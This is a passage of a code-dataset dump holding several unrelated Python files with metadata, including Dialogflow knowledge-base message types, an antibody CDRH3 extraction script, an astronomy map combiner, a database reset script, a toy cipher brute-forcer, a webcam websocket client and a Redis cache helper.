KnowledgeBase.\n When the KnowledgeBase is created/updated, this\n is populated for all non en-us languages. If not\n populated, the default language en-us applies.\n \"\"\"\n\n name: str = proto.Field(\n proto.STRING,\n number=1,\n )\n display_name: str = proto.Field(\n proto.STRING,\n number=2,\n )\n language_code: str = proto.Field(\n proto.STRING,\n number=4,\n )\n\n\nclass ListKnowledgeBasesRequest(proto.Message):\n r\"\"\"Request message for\n [KnowledgeBases.ListKnowledgeBases][google.cloud.dialogflow.v2beta1.KnowledgeBases.ListKnowledgeBases].\n\n Attributes:\n parent (str):\n Required. The project to list of knowledge bases for.\n Format: ``projects//locations/``.\n page_size (int):\n The maximum number of items to return in a\n single page. By default 10 and at most 100.\n page_token (str):\n The next_page_token value returned from a previous list\n request.\n filter (str):\n The filter expression used to filter knowledge bases\n returned by the list method. The expression has the\n following syntax:\n\n [AND ] ...\n\n The following fields and operators are supported:\n\n - display_name with has(:) operator\n - language_code with equals(=) operator\n\n Examples:\n\n - 'language_code=en-us' matches knowledge bases with en-us\n language code.\n - 'display_name:articles' matches knowledge bases whose\n display name contains \"articles\".\n - 'display_name:\"Best Articles\"' matches knowledge bases\n whose display name contains \"Best Articles\".\n - 'language_code=en-gb AND display_name=articles' matches\n all knowledge bases whose display name contains\n \"articles\" and whose language code is \"en-gb\".\n\n Note: An empty filter string (i.e. \"\") is a no-op and will\n result in no filtering.\n\n For more information about filtering, see `API\n Filtering `__.\n \"\"\"\n\n parent: str = proto.Field(\n proto.STRING,\n number=1,\n )\n page_size: int = proto.Field(\n proto.INT32,\n number=2,\n )\n page_token: str = proto.Field(\n proto.STRING,\n number=3,\n )\n filter: str = proto.Field(\n proto.STRING,\n number=4,\n )\n\n\nclass ListKnowledgeBasesResponse(proto.Message):\n r\"\"\"Response message for\n [KnowledgeBases.ListKnowledgeBases][google.cloud.dialogflow.v2beta1.KnowledgeBases.ListKnowledgeBases].\n\n Attributes:\n knowledge_bases (MutableSequence[google.cloud.dialogflow_v2beta1.types.KnowledgeBase]):\n The list of knowledge bases.\n next_page_token (str):\n Token to retrieve the next page of results,\n or empty if there are no more results in the\n list.\n \"\"\"\n\n @property\n def raw_page(self):\n return self\n\n knowledge_bases: MutableSequence[\"KnowledgeBase\"] = proto.RepeatedField(\n proto.MESSAGE,\n number=1,\n message=\"KnowledgeBase\",\n )\n next_page_token: str = proto.Field(\n proto.STRING,\n number=2,\n )\n\n\nclass GetKnowledgeBaseRequest(proto.Message):\n r\"\"\"Request message for\n [KnowledgeBases.GetKnowledgeBase][google.cloud.dialogflow.v2beta1.KnowledgeBases.GetKnowledgeBase].\n\n Attributes:\n name (str):\n Required. The name of the knowledge base to retrieve. Format\n ``projects//locations//knowledgeBases/``.\n \"\"\"\n\n name: str = proto.Field(\n proto.STRING,\n number=1,\n )\n\n\nclass CreateKnowledgeBaseRequest(proto.Message):\n r\"\"\"Request message for\n [KnowledgeBases.CreateKnowledgeBase][google.cloud.dialogflow.v2beta1.KnowledgeBases.CreateKnowledgeBase].\n\n Attributes:\n parent (str):\n Required. The project to create a knowledge base for.\n Format: ``projects//locations/``.\n knowledge_base (google.cloud.dialogflow_v2beta1.types.KnowledgeBase):\n Required. The knowledge base to create.\n \"\"\"\n\n parent: str = proto.Field(\n proto.STRING,\n number=1,\n )\n knowledge_base: \"KnowledgeBase\" = proto.Field(\n proto.MESSAGE,\n number=2,\n message=\"KnowledgeBase\",\n )\n\n\nclass DeleteKnowledgeBaseRequest(proto.Message):\n r\"\"\"Request message for\n [KnowledgeBases.DeleteKnowledgeBase][google.cloud.dialogflow.v2beta1.KnowledgeBases.DeleteKnowledgeBase].\n\n Attributes:\n name (str):\n Required. The name of the knowledge base to delete. Format:\n ``projects//locations//knowledgeBases/``.\n force (bool):\n Optional. Force deletes the knowledge base.\n When set to true, any documents in the knowledge\n base are also deleted.\n \"\"\"\n\n name: str = proto.Field(\n proto.STRING,\n number=1,\n )\n force: bool = proto.Field(\n proto.BOOL,\n number=2,\n )\n\n\nclass UpdateKnowledgeBaseRequest(proto.Message):\n r\"\"\"Request message for\n [KnowledgeBases.UpdateKnowledgeBase][google.cloud.dialogflow.v2beta1.KnowledgeBases.UpdateKnowledgeBase].\n\n Attributes:\n knowledge_base (google.cloud.dialogflow_v2beta1.types.KnowledgeBase):\n Required. The knowledge base to update.\n update_mask (google.protobuf.field_mask_pb2.FieldMask):\n Optional. Not specified means ``update all``. Currently,\n only ``display_name`` can be updated, an InvalidArgument\n will be returned for attempting to update other fields.\n \"\"\"\n\n knowledge_base: \"KnowledgeBase\" = proto.Field(\n proto.MESSAGE,\n number=1,\n message=\"KnowledgeBase\",\n )\n update_mask: field_mask_pb2.FieldMask = proto.Field(\n proto.MESSAGE,\n number=2,\n message=field_mask_pb2.FieldMask,\n )\n\n\n__all__ = tuple(sorted(__protobuf__.manifest))\n", "sub_path": "google/cloud/dialogflow_v2beta1/types/knowledge_base.py", "file_name": "knowledge_base.py", "file_ext": "py", "file_size_in_byte": 8449, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "proto.module", "line_number": 23, "usage_type": "call"}, {"api_name": "proto.Message", "line_number": 37, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 66, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 67, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 70, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 71, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 74, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 75, "usage_type": "attribute"}, {"api_name": "proto.Message", "line_number": 80, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 125, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 126, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 129, "usage_type": "call"}, {"api_name": "proto.INT32", "line_number": 130, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 133, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 134, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 137, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 138, "usage_type": "attribute"}, {"api_name": "proto.Message", "line_number": 143, "usage_type": "attribute"}, {"api_name": "typing.MutableSequence", "line_number": 160, "usage_type": "name"}, {"api_name": "proto.RepeatedField", "line_number": 160, "usage_type": "call"}, {"api_name": "proto.MESSAGE", "line_number": 161, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 165, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 166, "usage_type": "attribute"}, {"api_name": "proto.Message", "line_number": 171, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 181, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 182, "usage_type": "attribute"}, {"api_name": "proto.Message", "line_number": 187, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 199, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 200, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 203, "usage_type": "call"}, {"api_name": "proto.MESSAGE", "line_number": 204, "usage_type": "attribute"}, {"api_name": "proto.Message", "line_number": 210, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 224, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 225, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 228, "usage_type": "call"}, {"api_name": "proto.BOOL", "line_number": 229, "usage_type": "attribute"}, {"api_name": "proto.Message", "line_number": 234, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 247, "usage_type": "call"}, {"api_name": "proto.MESSAGE", "line_number": 248, "usage_type": "attribute"}, {"api_name": "google.protobuf.field_mask_pb2.FieldMask", "line_number": 252, "usage_type": "attribute"}, {"api_name": "google.protobuf.field_mask_pb2", "line_number": 252, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 252, "usage_type": "call"}, {"api_name": "proto.MESSAGE", "line_number": 253, "usage_type": "attribute"}, {"api_name": "google.protobuf.field_mask_pb2.FieldMask", "line_number": 255, "usage_type": "attribute"}, {"api_name": "google.protobuf.field_mask_pb2", "line_number": 255, "usage_type": "name"}]} +{"seq_id": "383942328", "text": "from datetime import datetime\nimport os.path\nimport urllib2\n\n\ndata_atual = datetime.now()\ndata_padronizada = data_atual.strftime('%d/%m/%Y %H:%M')\n\n\nclass DataHora:\n def escrever_data_hora(self):\n caminho = os.path.join('arquivos', 'data_hora.txt')\n with open(caminho, 'a') as arquivo:\n arquivo.write(data_padronizada)\n arquivo.write(\"\\n\")\n\n def data_hora(self):\n if os.path.exists('arquivos/data_hora.txt'):\n self.escrever_data_hora()\n print('Data e hora registradas.')\n else:\n self.escrever_data_hora()\n print('Arquivo criado.')\n\n def verificar_ou_criar_dir(self):\n if os.path.isdir('arquivos'):\n print('Diretorio pronto para uso.')\n else:\n os.mkdir('arquivos')\n print('Diretorio criado.')\n self.data_hora()\n\n\nclass WebPage:\n def webpage(self):\n response = urllib2.urlopen(\"http://www.google.com.br\")\n local = os.path.join('arquivos', 'google.html')\n with open(local, 'a') as arq:\n arq.write(response.read())\n\n print('Arquivo html no diretorio.')\n\n\n\n\n\n\n\n\n\n\n", "sub_path": "data_hora/data_hora_webpage.py", "file_name": "data_hora_webpage.py", "file_ext": "py", "file_size_in_byte": 1162, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "datetime.datetime.now", "line_number": 6, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 6, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 12, "usage_type": "name"}, {"api_name": "os.path.path.exists", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 18, "usage_type": "name"}, {"api_name": "os.path.path.isdir", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 26, "usage_type": "name"}, {"api_name": "os.path.mkdir", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "name"}, {"api_name": "urllib2.urlopen", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "530066528", "text": "from Bio import SeqIO\n\nheader_list = []\nantibody_list = []\nseq_list = []\ncdrh3_locations = []\nhcdr3_sequences = []\n\n# parses data from .fasta file and places headers and sequences into lists\nfor record in SeqIO.parse(\"all_BNABs_for_table.SMUA.kappas.Mar15.fasta\",\n \"fasta\"):\n header_list.append(record.id)\n seq_list.append(str(record.seq))\n\n# we can isolate the start of the CDRH3 location by counting the number of\n# markupcode positions before the vdj and we can isolate the end of the CDRH3\n# by adding the total number of V, n, D, and J markup positions\n\n# below pulls out the name of each antibody from the header list\nfor i in range(0, len(header_list), 3):\n antibody_list.append(header_list[i])\n\n# below pulls out the markup from the list to identify where the CDRH3 is\nfor i in range(2, len(seq_list), 3):\n VDJ_start = seq_list[i].count('1') + seq_list[i].count('A') + seq_list[\n i].count('2') + seq_list[i].count('B') + seq_list[i].count('3')\n VDJ_end = seq_list[i].count('V') + seq_list[i].count('n') + seq_list[\n i].count('D') + seq_list[i].count('J') + VDJ_start\n cdrh3_location = [VDJ_start, VDJ_end]\n cdrh3_locations.append(cdrh3_location)\n\n# below pulls out the sequences of the cdrh3 from each bnab\nfor i in range(0, len(seq_list), 3):\n sequence = seq_list[i]\n index_one, index_two = cdrh3_locations[int(i/3)]\n hcdr3_sequences.append(sequence[index_one:index_two])\n\n# below combines the antibody name and cdrh3 length into a dictionary\nkappa_chain_dictionary = dict(zip(antibody_list, hcdr3_sequences))\nprint(kappa_chain_dictionary)", "sub_path": "CDRH3 extraction/CDRH3_extraction_kappa_chain.py", "file_name": "CDRH3_extraction_kappa_chain.py", "file_ext": "py", "file_size_in_byte": 1621, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "Bio.SeqIO.parse", "line_number": 10, "usage_type": "call"}, {"api_name": "Bio.SeqIO", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "374923535", "text": "import xidplus\nimport pickle\nimport numpy as np\nfrom xidplus import catalogue\nfrom xidplus import moc_routines\nfrom astropy import wcs\nfrom astropy.io import fits\nfrom xidplus import posterior_maps as postmaps\nfrom astropy import wcs\n\nimport os\nimport sys\n\nsys.path.remove(\"/mnt/pact/im281/HELP/XID_plus\")\nsys.path.remove(\"/mnt/pact/im281/HELP/herschelhelp_python\")\n\noutput_folder='./data/'\n\n\nwith open(output_folder+'Tiles.pkl',\"rb\") as f:\n Master = pickle.load(f)\ntiles=Master['tiles']\norder=Master['order']\n\n\noutfile=output_folder+'Master_prior.pkl'\nwith open(outfile, 'rb') as f:\n obj=pickle.load(f)\npriors=obj['priors']\n\n\n\n#hdulist24=fits.open(output_folder+'dmu26_XID+MIPS_ELAIS-N2_Bayes_Pval.fits')\nhdulist24=postmaps.make_fits_image(priors[0],np.full_like(priors[0].sim,np.nan))\n\n\n\nfailed_tiles=[]\nfor i in range(0,len(tiles)):\n\tprint('On tile '+str(i)+' out of '+str(len(tiles)))\n\ttry:\n\t\tBayes_24_tile=fits.open(output_folder+'Tile_'+str(tiles[i])+'_'+str(order)+'_MIPS_24_Bayes_Pval.fits')\n\n\t\tx_ind,y_ind=np.meshgrid(np.arange(0,Bayes_24_tile[1].header['NAXIS1'],dtype=np.int16)-Bayes_24_tile[1].header['CRPIX1']+hdulist24[1].header['CRPIX1'],np.arange(0,Bayes_24_tile[1].header['NAXIS2'],dtype=np.int16)-Bayes_24_tile[1].header['CRPIX2']+hdulist24[1].header['CRPIX2'])\n\n\t\tgood=Bayes_24_tile[1].data>-6\n\n\t\thdulist24[1].data[y_ind[good].astype(np.int16),x_ind[good].astype(np.int16)]=Bayes_24_tile[1].data[good]\n\t\t\n\n\n\t\tBayes_24_tile.close()\n\texcept IOError:\n\t\tprint('issue with tile '+str(tiles[i]))\n\t\tfailed_tiles.append(tiles[i])\n\t\n\nhdulist24.writeto(output_folder+'dmu26_XID+MIPS_EGS_Bayes_Pval.fits',clobber=True)\n\noutfile=output_folder+'failed_tiles.pkl'\nwith open(outfile, 'wb') as f:\n pickle.dump({'tiles':failed_tiles,'order':order},f)\n", "sub_path": "dmu26/dmu26_XID+MIPS_EGS/make_combined_map.py", "file_name": "make_combined_map.py", "file_ext": "py", "file_size_in_byte": 1765, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sys.path.remove", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.path.remove", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 21, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 28, "usage_type": "call"}, {"api_name": "xidplus.posterior_maps.make_fits_image", "line_number": 34, "usage_type": "call"}, {"api_name": "xidplus.posterior_maps", "line_number": 34, "usage_type": "name"}, {"api_name": "numpy.full_like", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 34, "usage_type": "attribute"}, {"api_name": "astropy.io.fits.open", "line_number": 42, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 42, "usage_type": "name"}, {"api_name": "numpy.meshgrid", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.int16", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "569301623", "text": "from db.models.base import engine, Session\nimport sqlalchemy as sqla # pylint: disable=E0401\nimport sqlalchemy.ext.declarative as sqld # pylint: disable=E0401\n\n\ndef destroy():\n\tprint(\"Destroying DB\")\n\tsqla_base = sqld.declarative_base()\n\tsqla_base.metadata.bind = engine\n\tsqla_base.metadata.drop_all()\n\n\t# sql = sqla.text(\"SET FOREIGN_KEY_CHECKS = 0\")\n\tsession = Session()\n\t# session.execute(sql)\n\tfor table in engine.table_names():\n\t\tsql = sqla.text(\"DROP TABLE IF EXISTS {} CASCADE \".format(table))\n\t\tprint(sql)\n\t\tsession.execute(sql)\n\tprint(\"Destroying DB Complete\")\n\n\nif __name__ == '__main__':\n\tdestroy()\n", "sub_path": "backend/db/scripts/destroy.py", "file_name": "destroy.py", "file_ext": "py", "file_size_in_byte": 612, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 8, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.declarative", "line_number": 8, "usage_type": "name"}, {"api_name": "db.models.base.engine", "line_number": 9, "usage_type": "name"}, {"api_name": "db.models.base.Session", "line_number": 13, "usage_type": "call"}, {"api_name": "db.models.base.engine.table_names", "line_number": 15, "usage_type": "call"}, {"api_name": "db.models.base.engine", "line_number": 15, "usage_type": "name"}, {"api_name": "sqlalchemy.text", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "568286310", "text": "import base64\nimport random\nimport string\nimport binascii\n\nrounds = 80\n\n\ndef decrypt(flag, key):\n for i in range(rounds):\n print(\"got to round: \"+ str(i))\n encode_b64 = key[\"base64_chosen\"].pop()\n if encode_b64:\n flag = base64.b64decode(flag.encode('utf8')).decode('utf8')\n else:\n alphabet = string.ascii_letters + string.digits\n shift = key[\"shift\"].pop()\n alphabet_shift = alphabet[:-shift] + alphabet[-shift:]\n flag = flag.translate(str.maketrans(alphabet, alphabet_shift))\n return flag\n\n\ndef record_possible_key():\n random.seed()\n recorded_key = {\"base64_chosen\": [],\n \"shift\": []}\n for i in range(rounds):\n encode_b64 = random.random() < 0.5\n recorded_key[\"base64_chosen\"].append(encode_b64)\n if not encode_b64:\n alphabet = string.ascii_letters + string.digits\n shift = random.randint(1, len(alphabet))\n recorded_key[\"shift\"].append(shift)\n return recorded_key\n\n\ndef attempt_decrypt(actual_encrypted_flag):\n key = record_possible_key()\n try:\n possible_flag = decrypt(actual_encrypted_flag, key)\n except binascii.Error:\n print(\"binascii exception, base 64 when we shouldn't of\")\n return False, ''\n success = possible_flag[:3].lower() in ['sctf', 'flag']\n return success, possible_flag\n\n\ndef main():\n actual_encrypted_flag = open('encrypted.txt').read()\n success, possible_flag = attempt_decrypt(actual_encrypted_flag)\n tries = 0\n while not success:\n tries += 1\n print(tries)\n success, possible_flag = attempt_decrypt(actual_encrypted_flag)\n print(\"success: \" + possible_flag)\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "ciphered/encrypt.py", "file_name": "encrypt.py", "file_ext": "py", "file_size_in_byte": 1766, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "base64.b64decode", "line_number": 14, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 16, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 16, "usage_type": "attribute"}, {"api_name": "random.seed", "line_number": 24, "usage_type": "call"}, {"api_name": "random.random", "line_number": 28, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 31, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 31, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 32, "usage_type": "call"}, {"api_name": "binascii.Error", "line_number": 41, "usage_type": "attribute"}]} +{"seq_id": "637867349", "text": "\"\"\"\nProject: FandRec\nProgrammed by: Trenton Sauer, Trenton Scott, David Williams\nLast Modified:\nDescription: Client for the camera\nNotes:\n 1. camera_client needs to be installed and run on the machine\n that will be sending the frames to the server\n Liscense:\nCopyright (c) 2018, FandRec Dev Team\nAll rights reserved.\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n * Redistributions of source code must retain the above copyright\n notice, this list of conditions and the following disclaimer.\n * Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n * Neither the name of the FandRec Dev Team nor the\n names of its contributors may be used to endorse or promote products\n derived from this software without specific prior written permission.\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\nANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\nWARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL FandRec Dev Team BE LIABLE FOR ANY\nDIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\nLOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\nON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\nSOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n#==============================Imports=======================================\nimport sys, ujson, cv2, imutils\nimport numpy as np\n\nfrom twisted.python import log\n\nfrom twisted.protocols.basic import NetstringReceiver\n\nfrom autobahn.twisted.websocket import WebSocketClientFactory, \\\n WebSocketClientProtocol, connectWS\nfrom twisted.internet import reactor\nfrom imutils.video import WebcamVideoStream\n#=======================Application Interface===========================\nclass CameraClientProtocol(WebSocketClientProtocol):\n \"\"\"\n Description: Handles the receiving messages from the\n\t\t server and sends the frames back.\n \"\"\"\n #raw_frame = cv2.UMat(np.empty((540, 1172, 3), np.uint8))\n\n def __init__(self):\n self.fps = 10\n\n def onOpen(self):\n self.sendFrames()\n\n def sendFrames(self):\n \"\"\"\n Description: Gets a frame from the camera then\n encodes it as a json then sends it.\n \"\"\"\n\t# Grab frame\n frame = cv2.UMat(self.factory.camera.read())\n frame = cv2.resize(frame, (640,480))\n\n\t# Compress and Package frame\n out = cv2.imencode('.jpg', frame, [cv2.IMWRITE_JPEG_QUALITY, 70])[1].tolist()\n out = ujson.dumps(out)\n\n\t# Send frame\n self.sendMessage(out.encode(\"utf8\"))\n reactor.callLater(1/self.fps, self.sendFrames)\n\n\nclass CameraClientFactory(WebSocketClientFactory):\n \"\"\"\n Description: Starts the video capture from the local kinect or camera.\n \"\"\"\n def __init__(self, addr, cam_port):\n WebSocketClientFactory.__init__(self, addr, headers={'camera_id': 'camera1'})\n print(\"Starting Camera\")\n self.camera = WebcamVideoStream(src=0).start()\n\n#=================Client Main===================================\n\ndef main():\n \"\"\"\n Description: Starts CameraClientProtocol defined above which sends\n the frames from the camera to the server\n \"\"\"\n #STEP 1: Setup the factory\n log.startLogging(sys.stdout)\n ip_address = \"127.0.0.1\"\n port_num = 8091\n\n factory = CameraClientFactory(\"ws://\" + ip_address + \":\" + str(port_num), 0)\n factory.protocol = CameraClientProtocol\n reactor.connectTCP(ip_address, port_num, factory)\n\n #STEP 2: Start the reactor\n reactor.run()\n\nif __name__ == '__main__':\n main()\n", "sub_path": "camera_client.py", "file_name": "camera_client.py", "file_ext": "py", "file_size_in_byte": 4051, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "autobahn.twisted.websocket.WebSocketClientProtocol", "line_number": 46, "usage_type": "name"}, {"api_name": "cv2.UMat", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 66, "usage_type": "call"}, {"api_name": "cv2.imencode", "line_number": 69, "usage_type": "call"}, {"api_name": "cv2.IMWRITE_JPEG_QUALITY", "line_number": 69, "usage_type": "attribute"}, {"api_name": "ujson.dumps", "line_number": 70, "usage_type": "call"}, {"api_name": "twisted.internet.reactor.callLater", "line_number": 74, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 74, "usage_type": "name"}, {"api_name": "autobahn.twisted.websocket.WebSocketClientFactory", "line_number": 77, "usage_type": "name"}, {"api_name": "autobahn.twisted.websocket.WebSocketClientFactory.__init__", "line_number": 82, "usage_type": "call"}, {"api_name": "autobahn.twisted.websocket.WebSocketClientFactory", "line_number": 82, "usage_type": "name"}, {"api_name": "imutils.video.WebcamVideoStream", "line_number": 84, "usage_type": "call"}, {"api_name": "twisted.python.log.startLogging", "line_number": 94, "usage_type": "call"}, {"api_name": "twisted.python.log", "line_number": 94, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 94, "usage_type": "attribute"}, {"api_name": "twisted.internet.reactor.connectTCP", "line_number": 100, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 100, "usage_type": "name"}, {"api_name": "twisted.internet.reactor.run", "line_number": 103, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 103, "usage_type": "name"}]} +{"seq_id": "635045284", "text": "import redis, json, datetime, logging\nimport config\n\nlog = logging.getLogger(__name__)\n\ndef check_cache(key):\n \"\"\"\n check the cache for an object stored under the given key, and convert it\n from a string into a python object\n \"\"\"\n client = redis.StrictRedis(host=config.REDIS_CACHE_HOST, port=config.REDIS_CACHE_PORT, db=config.REDIS_CACHE_DB)\n s = client.get(key)\n \n if s is None:\n return None\n \n try:\n obj = json.loads(s)\n except ValueError as e:\n # cache is corrupt, just get rid of it\n invalidate(key)\n return None\n \n return obj\n \ndef is_stale(bibjson):\n \"\"\"\n Check to see if the bibjson record in the supplied record is stale. Look\n in bibjson['license'][n]['provenance']['date'] for all n. If the newest date\n is older than the stale time, then the record is stale. If the record does\n not have a licence, it is stale.\n \"\"\"\n # check that the record has a licence at all\n if not \"license\" in bibjson:\n return True\n \n # get the date strings of all the licences\n log.debug(\"stale check on: \" + str(bibjson))\n date_strings = [licence.get(\"provenance\", {}).get(\"date\") \n for licence in bibjson.get(\"license\", []) \n if licence.get(\"provenance\", {}).get(\"date\") is not None]\n \n # check that there were any dates, if not then the record is necessarily stale\n if len(date_strings) == 0:\n return True\n \n # convert all the viable date strings to datetimes\n dates = []\n for d in date_strings:\n try:\n dt = datetime.datetime.strptime(d, config.date_format)\n dates.append(dt)\n except ValueError as e:\n continue\n \n # check that at least one date has parsed, and if not assume that the record is stale\n if len(dates) == 0:\n return True\n \n # get the most recent date by sorting the list (reverse, most recent date first)\n dates.sort(reverse=True)\n most_recent = dates[0]\n \n # now determine if the most recent date is older or newer than the stale timeout\n td = datetime.timedelta(seconds=config.licence_stale_time)\n n = datetime.datetime.now()\n stale_date = most_recent + td\n return stale_date < n\n \ndef invalidate(key):\n \"\"\"\n remove anything identified by the supplied key from the cache\n \"\"\"\n client = redis.StrictRedis(host=config.REDIS_CACHE_HOST, port=config.REDIS_CACHE_PORT, db=config.REDIS_CACHE_DB)\n client.delete(key)\n \ndef cache(key, obj):\n \"\"\"\n take the provided python data structure, serialise it via json to a string, and\n store it at the provided key with the appropriate timeout. This may be\n required to create a new cache entry or update an existing one\n \"\"\"\n try:\n s = json.dumps(obj)\n except TypeError:\n raise CacheException(\"can only cache python objects that can be sent through json.dumps\")\n \n client = redis.StrictRedis(host=config.REDIS_CACHE_HOST, port=config.REDIS_CACHE_PORT, db=config.REDIS_CACHE_DB)\n client.setex(key, config.REDIS_CACHE_TIMEOUT, s)\n \nclass CacheException(Exception):\n def __init__(self, message):\n self.message = message\n super(CacheException, self).__init__(self, message)\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n", "sub_path": "openarticlegauge/cache.py", "file_name": "cache.py", "file_ext": "py", "file_size_in_byte": 3411, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 4, "usage_type": "call"}, {"api_name": "redis.StrictRedis", "line_number": 11, "usage_type": "call"}, {"api_name": "config.REDIS_CACHE_HOST", "line_number": 11, "usage_type": "attribute"}, {"api_name": "config.REDIS_CACHE_PORT", "line_number": 11, "usage_type": "attribute"}, {"api_name": "config.REDIS_CACHE_DB", "line_number": 11, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 18, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 51, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 51, "usage_type": "attribute"}, {"api_name": "config.date_format", "line_number": 51, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 65, "usage_type": "call"}, {"api_name": "config.licence_stale_time", "line_number": 65, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 66, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 66, "usage_type": "attribute"}, {"api_name": "redis.StrictRedis", "line_number": 74, "usage_type": "call"}, {"api_name": "config.REDIS_CACHE_HOST", "line_number": 74, "usage_type": "attribute"}, {"api_name": "config.REDIS_CACHE_PORT", "line_number": 74, "usage_type": "attribute"}, {"api_name": "config.REDIS_CACHE_DB", "line_number": 74, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 84, "usage_type": "call"}, {"api_name": "redis.StrictRedis", "line_number": 88, "usage_type": "call"}, {"api_name": 